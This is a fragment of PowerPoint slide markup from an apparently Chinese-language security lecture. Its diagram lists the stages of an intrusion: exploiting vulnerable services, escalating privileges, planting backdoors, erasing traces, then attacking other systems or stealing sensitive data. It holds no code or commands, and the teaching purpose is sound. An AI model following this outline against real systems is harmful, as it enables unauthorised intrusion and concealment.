              <a:t>洞的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714760" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3048000"/>
            <a:ext cx="685800" cy="1524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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714761" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2590800"/>
            <a:ext cx="685800" cy="25146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提</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>升</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714762" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="3048000"/>
            <a:ext cx="685800" cy="1524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安装</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多个</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714763" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="3048000"/>
            <a:ext cx="685800" cy="1524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清除</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚印</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714764" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="1676400"/>
            <a:ext cx="1143000" cy="762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攻击其</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>他系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714765" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="3505200"/>
            <a:ext cx="1143000" cy="762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获取敏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>感信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714766" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="5257800"/>
            <a:ext cx="1143000" cy="762000"/>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作为其</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>他用途</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714767" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3657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8" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3657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9" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="3657600"/>
            <a:ext cx="4572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0" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3657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1" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="3657600"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 25000"/>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2" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="19812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3" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="1828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4" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="762000" y="4495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5" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7315200" y="45720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4776" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1871663"/>
            <a:ext cx="457200" cy="3919537"/>
            <a:chOff x="1296" y="1179"/>
            <a:chExt cx="288" cy="2469"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="714777" name="AutoShape 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="3169014">
              <a:off x="1021" y="1454"/>
              <a:ext cx="837" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 72656"/>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8" name="AutoShape 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="18430986" flipV="1">
              <a:off x="1021" y="3086"/>
              <a:ext cx="837" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 72656"/>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4779" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1"/>
              <a:t>较高明的入侵步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1"/>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4756"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71475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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>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4757"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714757"/>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714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71477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14759"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714759"/>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714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71477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714758"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714758"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>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714760"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714760"/>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714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
